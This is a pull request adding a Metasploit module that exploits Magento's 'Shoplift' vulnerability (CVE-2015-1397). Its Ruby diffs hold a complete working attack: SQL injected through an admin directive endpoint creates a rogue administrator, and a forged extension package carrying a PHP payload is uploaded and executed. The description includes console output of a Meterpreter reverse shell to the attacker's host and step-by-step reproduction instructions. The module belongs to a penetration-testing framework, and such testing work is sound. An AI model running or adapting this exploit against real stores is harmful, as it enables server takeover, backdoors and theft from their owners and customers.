### PR TITLE
Add a module for Magento's Shoplift RCE

### DIFF
--- a/modules/exploits/multi/http/magento_rce.rb
+++ b/modules/exploits/multi/http/magento_rce.rb
@@ -147,8 +147,6 @@ class Metasploit4 < Msf::Exploit::Remote
 
     if res.code == 301 or res.code == 302
       print_status "File permissions set"
-    elsif res.body.include('Your Magento folder does not have sufficient write permissions')
-      fail_with(Failure::NoAccess, 'Unable to upload our malicious package because the application has no write permission.')
     else
       print_warnings "Error setting file permissions"
     end
@@ -170,8 +168,11 @@ class Metasploit4 < Msf::Exploit::Remote
     })
 
     if res && res.code == 200
+      if res.body.include('Your Magento folder does not have sufficient write permissions')
+        fail_with(Failure::NoAccess, 'It seems that your Magento instance has no write permission. We will not be able to backdoor it.')
+      end
       # We need to split the cookie, since Magento will
-      # Set a cookie, delete it, then set another one.
+      # set a cookie, delete it, then set another one.
       res.get_cookies.split(' ').last
     else
       fail_with(Failure::BadConfig, "Unable to login at #{uri} to get the session cookie.")

--- a/modules/exploits/multi/http/magento_rce.rb
+++ b/modules/exploits/multi/http/magento_rce.rb
@@ -1,0 +1,275 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'rubygems/package'
+require 'rexml/document'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include REXML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Magento RCE (Shoplift)',
+      'Description'    => %q(
+        This module exploits the infamous Magento's Shoplift vulnerability
+        to create a new admininitrator account,
+        then it creates a backdoor module on the fly,
+        and install it to achieve code execution.
+
+        Versions before 1.9.1.0 are vulnerable.
+      ),
+      'Author'         => [
+        'Netanel Rubin', # discovery
+        'Julien (jvoisin) Voisin' # metasploit module
+      ],
+      'References'     =>
+        [
+          ['CVE', '2015-1397'],
+          ['URL', 'http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/'],
+          ['EDB', 37977]
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['php'],
+      'Targets'        => [
+        [ 'Magento CE <= 1.9.1.0', {}],
+        [ 'Magento EE <= 1.14.1.0', {}]
+      ],
+      'Arch'           => ARCH_PHP,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 28 2015'
+  ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'URI to Magento', '/magento'])
+      ], self.class
+    )
+  end
+
+  def check
+    res = send_request_cgi({ 'uri' => target_uri.path })
+    return unless res
+    return Exploit::CheckCode::Appears if res.body =~ /201[01234] Magento/
+    return Exploit::CheckCode::Detected if res.body.include?('Magento')
+  end
+
+  def exploit
+    @username = Rex::Text.rand_text_alpha(8)
+    @password = Rex::Text.rand_text_alpha(8)
+    @package_name = Rex::Text.rand_text_alpha(8)
+
+    # We generate a code 3XX error page, since magento only provides
+    # some for 5XX and 4XX, so we're sure to not overwrite anything.
+    page_name = "3#{Rex::Text.rand_text_numeric(2)}.php"
+
+    create_or_delete_admin('create')
+    cookie = obtain_session_cookie
+    create_backdoor(page_name, cookie)
+
+    print_status "Requesting malicious webpage"
+    send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, "errors/#{page_name}"),
+      'cookie' => cookie
+    })
+  end
+
+  def cleanup
+    remove_backdoor
+    create_or_delete_admin('delete')
+  end
+
+  def create_or_delete_admin(operation)
+    if operation == 'create'
+      query = "SET @SALT = 'rp';"
+      query << "SET @PASS = CONCAT(MD5(CONCAT( @SALT , '#{@password}') ), CONCAT(':', @SALT ));"
+      query << "SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;"
+      query << "INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,"
+      query << "`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES"
+      query << "('Firstname','Lastname','email@example.com','#{@username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());"
+      query << "INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES"
+      query << "(1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '#{@username}'),'Firstname');"
+    elsif operation == 'delete'
+      query = "DELETE FROM `admin_role` WHERE `user_id` = (SELECT user_id FROM admin_user WHERE username = '#{@username}');"
+      query << "DELETE FROM `admin_user` WHERE `username` = '#{@username}';"
+    end
+
+    filter = Rex::Text.encode_base64('popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);' + query)
+
+    directive = Rex::Text.encode_base64url("{{block type=Adminhtml/report_search_grid output=getCsvFile}}")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'       => normalize_uri(target_uri.path, '/admin/Cms_Wysiwyg/directive/index/'),
+      'vars_post' => {
+          '___directive' => directive,
+          'filter' => filter,
+          'forwarded' => 1
+      }
+    })
+
+    if res.code == 200
+      print_status "Account #{@username}/#{@password} #{operation}d on #{peer}"
+    else
+      fail_with(Failure::NotVulnerable, "Unable to #{operation} the account #{@username}/#{@password}}.")
+    end
+  end
+
+  def obtain_session_cookie
+    uri = normalize_uri(target_uri.path, '/downloader/')
+
+    res = send_request_cgi({
+        'uri'     => uri,
+        'method'  => 'POST',
+        'data'    => "username=#{@username}&password=#{@password}" })
+
+    res = send_request_cgi({ 'uri' => uri, 'cookie' => res.get_cookies.to_s })
+
+    res.get_cookies
+  end
+
+  def create_extension_file(page_name)
+    print_status 'Creating the backdoor file'
+
+    tarfile = StringIO.new('')
+    Gem::Package::TarWriter.new(tarfile) do |tar|
+      backdoor = payload.encoded
+      tar.add_file("errors/#{page_name}", 0440) do |io|
+        io.write(backdoor)
+      end
+
+      package = Element.new('package')
+      package.add_element('name').text = @package_name
+      package.add_element('version').text = (1..10).to_a.sample(4).join('.')
+      package.add_element('stability').text = 'devel'
+      package.add_element('licence').text = Rex::Text.rand_text_alpha(64)
+      package.add_element('channel').text = 'community'
+
+      author = Element.new('author')
+      author.add_element('name').text = Rex::Text.rand_surname
+      author.add_element('user').text = Rex::Text.rand_surname
+      author.add_element('email').text = Rex::Text.rand_surname + '@' + Rex::Text.rand_hostname
+      package.elements << Element.new('authors') << author
+
+      package.add_element('date').text = ::Time.now.strftime('%Y-%m-%d')
+      package.add_element('time').text = ::Time.now.strftime('%H:%M:%S')
+
+      target = Element.new('target')
+      target.add_attribute('name', 'mage')
+      dir2 = Element.new('dir')
+      dir2.add_attribute('name', 'errors')
+      file = Element.new('file')
+      file.add_attributes({ 'name' => page_name, 'hash' => Rex::Text.md5(backdoor) })
+      package << Element.new('contents') << target << Element.new('dir') << dir2 << file
+
+      php = Element.new('php')
+      php.add_element('min').text = '4.' + (1..10).to_a.sample(2).join('.')
+      php.add_element('max').text = '6.' + (1..10).to_a.sample(2).join('.')
+      package << Element.new('required') << php
+
+      doc = Document.new << XMLDecl.new << package
+
+      tar.add_file("package.xml", 0440) do |io|
+        io.write(doc.to_s)
+      end
+    end
+    tarfile.rewind
+
+    gz = StringIO.new('')
+    z = Zlib::GzipWriter.new(gz)
+    z.write tarfile.string
+    z.close
+
+    gz.string
+  end
+
+  def create_backdoor(page_name, cookie)
+    file = create_extension_file(page_name)
+    uri = normalize_uri(target_uri.path, '/downloader/')
+
+    # CSRF token
+    res = send_request_cgi({ 'uri' => uri, 'cookie' => cookie })
+    csrf_token = res.body.match(/input name="form_key" type="hidden" value="([^"]+)"/m).captures[0]
+    print_status "CSRF token obtained (#{csrf_token})"
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(csrf_token, nil, nil, 'form-data; name="form_key"')
+    post_data.add_part(file, 'application/gzip', 'binary', "form-data; name=\"file\"; filename=\"#{Rex::Text.rand_text_alpha(8)}.tgz\"")
+
+    print_status "Installing the malicious module"
+
+    res = send_request_cgi({
+        "method" => "POST",
+        "uri"    => normalize_uri(target_uri.path, '/downloader/index.php'),
+        "ctype"  => "multipart/form-data; boundary=#{post_data.bound}",
+        "data"   => post_data.to_s,
+        "cookie" => cookie,
+        "vars_get" => {
+          'A' => 'connectInstallPackageUpload',
+          'maintenance' => 0,
+          'archive_type' => 0
+        }
+    })
+
+    if res && res.code == 200
+      print_status 'Malicious module installed'
+    else
+      print_warning 'Unable to upload malicious module'
+    end
+
+    # Cleaning cache to improve reliability
+    send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, '/downloader/index.php'),
+      'cookie' => cookie,
+      'vars_get' => {
+        'A' => 'cleanCache',
+        'maintenance' => 0
+      }
+    })
+  end
+
+  def remove_backdoor
+    cookie = obtain_session_cookie
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, '/downloader/index.php'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'cookie' => cookie,
+      'vars_get' => {
+        'A' => 'connectPackagesPost',
+        'maintenance' => 0,
+        'archive_type' => 0,
+      },
+      'vars_post' => {
+        'form_id' => 'connect_packages_0',
+        "actions[community|#{@package_name}]" => 'uninstall'
+      }
+    })
+
+    if res.code == 200
+      print_status "Backdoor package removed"
+    else
+      print_warnings "Backdoor package not removed"
+    end
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, '/downloader/index.php'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'cookie' => cookie,
+      'vars_post' => { 'clean_sessions' => 0 },
+      'vars_get' => {
+        'A' => 'cleanCache',
+        'maintenance' => 0
+      }
+    })
+  end
+end

--- a/modules/exploits/multi/http/magento_rce.rb
+++ b/modules/exploits/multi/http/magento_rce.rb
@@ -37,10 +37,7 @@ class Metasploit4 < Msf::Exploit::Remote
         ],
       'License'        => MSF_LICENSE,
       'Platform'       => ['php'],
-      'Targets'        => [
-        [ 'Magento CE <= 1.9.1.0', {}],
-        [ 'Magento EE <= 1.14.1.0', {}]
-      ],
+      'Targets'        => [ [ 'auto', {}] ],
       'Arch'           => ARCH_PHP,
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jun 28 2015'
@@ -55,7 +52,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi({ 'uri' => target_uri.path })
-    return unless res
+    return unless res && res != 200
     return Exploit::CheckCode::Appears if res.body =~ /201[01234] Magento/
     return Exploit::CheckCode::Detected if res.body.include?('Magento')
   end
@@ -123,15 +120,24 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def obtain_session_cookie
-    uri = normalize_uri(target_uri.path, '/downloader/')
+    uri = normalize_uri(target_uri.path, '/downloader/index.php')
 
     res = send_request_cgi({
         'uri'     => uri,
         'method'  => 'POST',
-        'data'    => "username=#{@username}&password=#{@password}" })
+        "ctype"  => "application/x-www-form-urlencoded",
+        'vars_post'    => {
+          'form_key' => get_csrf_token,
+          "username" => @username,
+          'password' => @password
+        },
+        'vars_get' => { 'A' => 'loggedin' }
+    })
 
     if res && res.code == 200
       res.get_cookies
+    else
+      fail_with(Failure::BadConfig, "Unable to login at #{uri} to get the session cookie.")
     end
   end
 
@@ -190,18 +196,26 @@ class Metasploit4 < Msf::Exploit::Remote
     gz.string
   end
 
+  def get_csrf_token(cookie=nil)
+    res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, '/downloader/'),
+        'cookie' => cookie
+      })
+    return unless res && res.code == 200
+
+    match = res.body.match(/input name="form_key" type="hidden" value="([^"]+)"/m)
+    return nil unless match
+
+    csrf_token = match.captures[0]
+    print_status "CSRF token obtained (#{csrf_token})"
+    csrf_token
+  end
+
   def create_backdoor(page_name, cookie)
     file = create_extension_file(page_name)
-    uri = normalize_uri(target_uri.path, '/downloader/')
-
-    # CSRF token
-    res = send_request_cgi({ 'uri' => uri, 'cookie' => cookie })
-    return unless res
-    csrf_token = res.body.match(/input name="form_key" type="hidden" value="([^"]+)"/m).captures[0]
-    print_status "CSRF token obtained (#{csrf_token})"
 
     post_data = Rex::MIME::Message.new
-    post_data.add_part(csrf_token, nil, nil, 'form-data; name="form_key"')
+    post_data.add_part(get_csrf_token(cookie), nil, nil, 'form-data; name="form_key"')
     post_data.add_part(file, 'application/gzip', 'binary', "form-data; name=\"file\"; filename=\"#{Rex::Text.rand_text_alpha(8)}.tgz\"")
 
     print_status "Installing the malicious module"
@@ -247,7 +261,7 @@ class Metasploit4 < Msf::Exploit::Remote
       'vars_get' => {
         'A' => 'connectPackagesPost',
         'maintenance' => 0,
-        'archive_type' => 0,
+        'archive_type' => 0
       },
       'vars_post' => {
         'form_id' => 'connect_packages_0',

--- a/modules/exploits/multi/http/magento_rce.rb
+++ b/modules/exploits/multi/http/magento_rce.rb
@@ -68,6 +68,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
     create_or_delete_admin('create')
     cookie = obtain_session_cookie
+    set_file_permissions(cookie)
     create_backdoor(page_name, cookie)
 
     print_status "Requesting malicious webpage"
@@ -116,6 +117,38 @@ class Metasploit4 < Msf::Exploit::Remote
       print_status "Account #{@username}/#{@password} #{operation}d on #{peer}"
     else
       fail_with(Failure::NotVulnerable, "Unable to #{operation} the account #{@username}/#{@password}}.")
+    end
+  end
+
+  def set_file_permissions(cookie=nil)
+    print_status 'Setting custom file permissions'
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, '/downloader/index.php'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'cookie' => cookie,
+      'vars_get' => {
+        'A' => 'settingsPost'
+      },
+      'vars_post' => {
+        'protocol' => 'http',
+        'preferred_state' => 'stable',
+        'use_custom_permissions_mode' => '1',
+        'mkdir_mode' => '755',
+        'chmod_file_mode' => '644',
+        'deployment_type' => 'fs',
+        'ftp_host' => '',
+        'ftp_login' => '',
+        'ftp_password' => '',
+        'ftp_path' => ''
+      }
+    })
+
+    if res.code == 301 or res.code == 302
+      print_status "File permissions set"
+    else
+      print_warnings "Error setting file permissions"
     end
   end
 

--- a/modules/exploits/multi/http/magento_rce.rb
+++ b/modules/exploits/multi/http/magento_rce.rb
@@ -147,6 +147,8 @@ class Metasploit4 < Msf::Exploit::Remote
 
     if res.code == 301 or res.code == 302
       print_status "File permissions set"
+    elsif res.body.include('Your Magento folder does not have sufficient write permissions')
+      fail_with(Failure::NoAccess, 'Unable to upload our malicious package because the application has no write permission.')
     else
       print_warnings "Error setting file permissions"
     end

--- a/modules/exploits/multi/http/magento_rce.rb
+++ b/modules/exploits/multi/http/magento_rce.rb
@@ -52,7 +52,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi({ 'uri' => target_uri.path })
-    return unless res && res != 200
+    return unless res && res.code == 200
     return Exploit::CheckCode::Appears if res.body =~ /201[01234] Magento/
     return Exploit::CheckCode::Detected if res.body.include?('Magento')
   end
@@ -104,7 +104,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
     res = send_request_cgi({
       'method' => 'POST',
-      'uri'       => normalize_uri(target_uri.path, '/admin/Cms_Wysiwyg/directive/index/'),
+      'uri'       => normalize_uri(target_uri.path, 'index.php/admin/Cms_Wysiwyg/directive/index/'),
       'vars_post' => {
           '___directive' => directive,
           'filter' => filter,
@@ -135,7 +135,9 @@ class Metasploit4 < Msf::Exploit::Remote
     })
 
     if res && res.code == 200
-      res.get_cookies
+      # We need to split the cookie, since Magento will
+      # Set a cookie, delete it, then set another one.
+      res.get_cookies.split(' ').last
     else
       fail_with(Failure::BadConfig, "Unable to login at #{uri} to get the session cookie.")
     end
@@ -215,7 +217,8 @@ class Metasploit4 < Msf::Exploit::Remote
     file = create_extension_file(page_name)
 
     post_data = Rex::MIME::Message.new
-    post_data.add_part(get_csrf_token(cookie), nil, nil, 'form-data; name="form_key"')
+    token = get_csrf_token(cookie)
+    if token then post_data.add_part(token, nil, nil, 'form-data; name="form_key"') end
     post_data.add_part(file, 'application/gzip', 'binary', "form-data; name=\"file\"; filename=\"#{Rex::Text.rand_text_alpha(8)}.tgz\"")
 
     print_status "Installing the malicious module"

--- a/modules/exploits/multi/http/magento_rce.rb
+++ b/modules/exploits/multi/http/magento_rce.rb
@@ -115,7 +115,7 @@ class Metasploit4 < Msf::Exploit::Remote
       }
     })
 
-    if res.code == 200
+    if res && res.code == 200
       print_status "Account #{@username}/#{@password} #{operation}d on #{peer}"
     else
       fail_with(Failure::NotVulnerable, "Unable to #{operation} the account #{@username}/#{@password}}.")
@@ -130,9 +130,9 @@ class Metasploit4 < Msf::Exploit::Remote
         'method'  => 'POST',
         'data'    => "username=#{@username}&password=#{@password}" })
 
-    res = send_request_cgi({ 'uri' => uri, 'cookie' => res.get_cookies.to_s })
-
-    res.get_cookies
+    if res && res.code == 200
+      res.get_cookies
+    end
   end
 
   def create_extension_file(page_name)
@@ -196,6 +196,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
     # CSRF token
     res = send_request_cgi({ 'uri' => uri, 'cookie' => cookie })
+    return unless res
     csrf_token = res.body.match(/input name="form_key" type="hidden" value="([^"]+)"/m).captures[0]
     print_status "CSRF token obtained (#{csrf_token})"
 
@@ -254,7 +255,7 @@ class Metasploit4 < Msf::Exploit::Remote
       }
     })
 
-    if res.code == 200
+    if res && res.code == 200
       print_status "Backdoor package removed"
     else
       print_warnings "Backdoor package not removed"


### PR DESCRIPTION
This module exploits the infamous [Magento](https://magento.com/)'s [Shoplift vulnerability](https://magento.com/security-patch) to create a new admininitrator account, then it creates a backdoor module on the fly, and install it to achieve code execution.

Tested on 1.9.0.0 CE and 1.9.1.0 CE.

Also, please squash this pull-request before merging it. If you're testing this PR, feel free to test [this one](https://github.com/rapid7/metasploit-framework/pull/6235) at the same time.
# Console output

```
msf > use exploit/multi/http/magento_rce
msf exploit(magento_rce) > set RHOST 192.168.1.25
RHOST => 192.168.1.25
msf exploit(magento_rce) > set RPORT 8081
RPORT => 8081
msf exploit(magento_rce) > set TARGETURI /
TARGETURI => /
msf exploit(magento_rce) > run

[*] Started reverse handler on 192.168.1.11:4444 
[*] Account skxQaZQU/ovYoCVXg created on 192.168.1.25:8081
[*] Creating the backdoor file
[*] CSRF token obtained (nBWhtbSPjpBOB6Ag)
[*] Installing the malicious module
[*] Malicious module installed
[*] Requesting malicious webpage
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:43470) at 2015-11-17 16:56:55 +0100
[*] Backdoor package removed
[*] Account skxQaZQU/ovYoCVXg deleted on 192.168.1.25:8081

meterpreter > getuid
Server username: www-data (33)
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.25 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(magento_rce) >
```
# How to reproduce
1. [x] Get the "Community Edition" of magento on [its website](https://www.magentocommerce.com/download) (Feel free to use bugmenot@mailinator.com/Password1 to log in)
2. [x] Install apache2 and php on your machine,
3. [x] Extract the Magento archive into your `/var/www`
4. [x] Launch metasploit, `use exploit/multi/http/magento_rce`, set options
5. [ ] Get your meterpreter session
